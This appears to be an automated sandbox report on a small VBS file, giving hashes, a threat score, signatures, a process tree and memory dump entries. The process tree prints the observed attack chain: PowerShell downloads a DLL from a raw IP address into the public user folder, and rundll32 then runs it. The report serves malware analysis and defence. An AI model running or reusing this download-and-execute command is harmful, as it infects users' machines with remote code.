Overview

overview

10

Static

static

1

IN(11)-9-1...63.vbs

windows7-x64

3

IN(11)-9-1...63.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-09-2023 07:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IN(11)-9-12-2023_639663.vbs

  • Size

    1KB

  • MD5

    8cd1c23782729f7b13e3132032059e51

  • SHA1

    7a32b8a787374840daeea67c1961085546820cb5

  • SHA256

    b820d64062d79bda89ff168acff318a14a4a0e8a06b69b074452e738ba6d485c

  • SHA512

    b7b95148b05713a80ba72b2e1343f12f713734280d54bc69cb1c653710bfad708459c8a9e102d2446cd38e220caff51b634bc012459df57294282e888677de17

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IN(11)-9-12-2023_639663.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" invoke-webrequest -uri 'http://23.88.100.71/jyi6mm2w2g.dll' -outfile 'c:\users\public\name.dll';
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2812
    • C:\Windows\System32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" c:\users\public\name.dll,DllRegisterServer
      2⤵
        PID:1692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2812-4-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2812-6-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2812-5-0x00000000024E0000-0x00000000024E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2812-7-0x0000000002830000-0x00000000028B0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2812-8-0x0000000002830000-0x00000000028B0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2812-9-0x0000000002830000-0x00000000028B0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2812-10-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2812-11-0x0000000002830000-0x00000000028B0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2812-12-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

      Filesize

      9.6MB

      Download